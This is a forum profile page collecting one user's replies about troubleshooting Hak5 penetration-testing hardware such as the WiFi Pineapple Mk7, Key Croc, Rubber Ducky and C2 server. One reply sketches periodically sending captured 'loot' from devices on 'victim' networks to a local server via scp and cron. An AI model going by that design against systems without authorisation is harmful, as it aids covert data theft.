Jump to content

chrizree

Active Members
  • Content Count

    420
  • Joined

  • Last visited

  • Days Won

    23

Posts posted by chrizree

  1. Try to avoid involving any virtual environment in arming mode before you know that it actually works with a "real life" computer. Disable all other network interfaces so that the network that the Shark offers is the only network that the computer can see/connect to.

  2. Don't expect an old field guide to cover a new variant of the Pineapple even though there are similarities between them. It's like bringing forward a Nokia 8110 manual when you have a brand new iPhone. It will for sure be vague in some aspects.

    What modules have you seen in videos that you can't find? Link/reference please...

    What exact modules from previous generations would you like to have? Is it on a "nice to have basis" or on a "need to have" basis? What are you going to do with modules that are based on concepts that are obsolete since years?

    I posted this on Discord yesterday, and it's still valid to me:

    Quote

    I guess the demand for modules has become some sort of "illness" as if volume itself is important ("if there's not a lot of modules, it's a bad product"), and in many cases ppl just don't really seem to know what they want to do with all the modules they want, they just want "a lot", because "a lot" is for some reason equal to "good", however, it's not about quantity, it's about quality and actual need

     

  3. yes, of course it is that button! you have to liberate the hacker within yourself! ūüėȬ†don't restrict your actions, if you can't find a software button, then look for the hardware one and if you can't see it, pick the thing apart... well... you don't need to pick the Mk7 apart since the button is there in plain sight on the "front" along with the USB ports, you may want to change the script though if you want to try it out so that you avoid the Mk7 to reboot, perhaps something like:

    #!/bin/bash
    echo "Hak5 WiFi Pineapple Mk7 hardware button pressed!" >> /root/mk7_btn_actions.log

     

    Darren also mentions it in this video:
    https://youtu.be/vR-WeW787UQ?t=153

  4. The Croc is kind of picky when it comes to keyboards sometimes. I've looped through a bunch. Some keyboards work perfectly fine, others work as a keyboard but nothing gets caught by the Croc and some keyboards just don't work at all with the Croc in between.

  5. It's the one and only button that is available on the Mk7, so no riddles when it comes to that.

    The script is located under
    /etc/pineapple
    and is called
    button_script

    You can edit using ssh or (as mentioned) in the web GUI of the Mk7

    Then just press the hardware button on the Mk7 and the script should execute, that's it!

  6. You need to supply more information to get some help/advise. What are you trying to verify? How are you connected to the Mk7? What steps are you doing and where do you get stuck? Have you read any documentation about the setup process on the Hak5 docs web site? Can you refer to any step described in that documentation or the videos that are published?

  7. I'm normally not in a situation chasing tx power so I can't really tell what NICs that are good for increasing tx specifically. You have to ask yourself why you want to hunt down high tx power settings. Why is it important? You don't have to tell me here in this forum, it's more a question you have to ask yourself, but I guess you have good reasons for it since you are in need of higher tx values. The only ones I got up to 30 dBm when testing were of the following chipsets, none of them are 5 GHz though.

    Ralink RT3572
    Ralink RT5370
    Ralink RT5372
    Ralink MT7601U
    Realtek RTL8192EU

  8. I guess you are still stuck in the scenario I recently posted. The server needs access to verify the license. You have to test out different scenarios to see how it behaves, but what I've seen so far (the standalone scenario isn't something I've "opted" for since I'm only interested in running it online) C2 gets grumpy in one way or the other if taken offline. Just start the C2 instance under different circumstances and see what it reports to the command line and how the GUI acts. It will tell you how usable it is in different situations, with or without internet access. To be totally offline you will have to find a way to emulate the license validation procedure which will most likely be both time consuming to develop and (most important) also violate any license agreement (or such). Not the way I would go for sure. If you want to collect loot in some "server like" solution, I would most likely investigate the possibility for the Hak5 devices to use scp and cron (for example) and gather the loot and periodically send the loot to a "server" that is local (can be a RPi, another Hak5 device, etc.). I know that some/several of them do support scp and cron. Then you need to figure out how each of the Hak5 devices can reach your loot collecting "server" since they have different ways to communicate (either directly via wireless or through a "victim" if not wireless and in that case you need the "victim" computer(s) or the "victim" network to be connected to the loot "server" in some way). It all depends on your use case scenario.

  9. I guess you are stuck with a chipset, or... perhaps firmware to be more correct, that has limited the tx-power to 20 dBm. I tried some different wireless NICs now and following the instructions in the 2nd link you posted using Kali. For some adapters, they showed just 20 dBm but some indicated 30 dBm. That tells me that it has nothing to do with Kali (or the method described) but is adapter specific. You have probably come across a AWUS036NHA that most likely has such kind of 20 dBm restriction. Are you within the EU (ETSI)? My AWUS036NHA is of the "German Revision" and since it's not possible to force the NIC above 20 dBm where other NICs have no problems indicating 30 dBm, then I guess that there is a ETSI restriction applied to the hardware itself.

  10. My guess is that you get "Error undefined" just because of the very fact that you are offline/standalone. I quickly put together a standalone environment with a RPi4, a PC and a simple "home router" and all of it was totally cut off from the internet. I got the same result; "Error undefined". I then connected the local standalone network so that it got internet access and everything was processed without any errors at all. I also captured the traffic in different stages using Wireshark and the server communicates with online resources during setup so it seems to be in need of internet access to be set up properly. Perhaps Hak5 wants to know that a license is used and the C2 instance "calls home" to verify/report this. Hard to tell though since it's all "cloaked" and therefore pure speculation, but the setup at least communicates with resources that can be linked to Hak5. Then it downloads things from Google related resources as well (fonts at least) so there is a most probable dependency to internet access.

    Edit:
    Well... to take the speculation out of it all... the C2 instance needs a working internet connection to even start the server and clearly tells all about it when being started or if you rip the cord with the server instance started.

  11. Not recently, I did some stuff at the time when Darren released the "PIN hack" video years ago, but I've had no reason to do anything serious involving Android and the Ducky. Although I really like the Ducky concept, I would probably go with the Bunny if I needed to select one of them. The Bunny costs a bit more, but it's an easier workflow and you get more features.

  12. Well, you need to be more specific about your problem, there's a lot of text but not really telling that much... What guides are you referring to? What packages are you trying to hunt down? What OS are you on? Is it about some Hak5 device? Is it only about increasing the tx power for the NHA NIC as the title says or something more (as the text suggests, but vaguely)?

  13. ok, you have to be more specific about your setup, what environments/OS:es are you using? A virtual Ubuntu machine on a Windows host? Or some other setup? If the first scenario, are you trying to pass through the Ducky to the Ubuntu virtual machine from the Windows host? What virtualization environment do you use? VMware, VirtualBox, other? However, I don't really understand why Ubuntu and virtual environments is thrown in the mix if the 15 seconds password hack is to be used. Not sure that it will work at all though. I think you should start with something more "basic" to really verify that the Ducky works at all since you seem to have problems to even get the bin file to the SD card...

×
×
  • Create New...